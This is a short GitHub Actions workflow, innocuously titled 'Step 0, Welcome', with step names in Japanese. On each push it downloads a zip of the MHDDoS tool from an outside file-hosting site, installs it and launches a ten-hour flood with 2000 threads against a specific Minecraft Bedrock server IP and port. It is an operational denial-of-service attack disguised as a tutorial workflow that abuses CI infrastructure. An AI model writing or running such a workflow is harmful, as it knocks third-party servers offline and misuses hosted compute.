name: Step 0, Welcome

on:
  push:
  workflow_dispatch:



jobs:

  build:


    runs-on: ubuntu-latest


    steps:

    - name: ダウンロード

      run: wget http://nkgpgc.sx3.jp/uploader51/upl/XBKJJOGiTTAconu8SnZ5/00372.zip

    - name: 展開

      run: unzip 00372.zip -d ./

    - name: コピー

      run: cp -R ./MHDDoS-2.4.3/* ./

    - name: インストール

      run: pip3 install -r requirements.txt

    - name: 実行

      run: python3 start.py　MCPE 162.43.20.186:19132 2000 36000
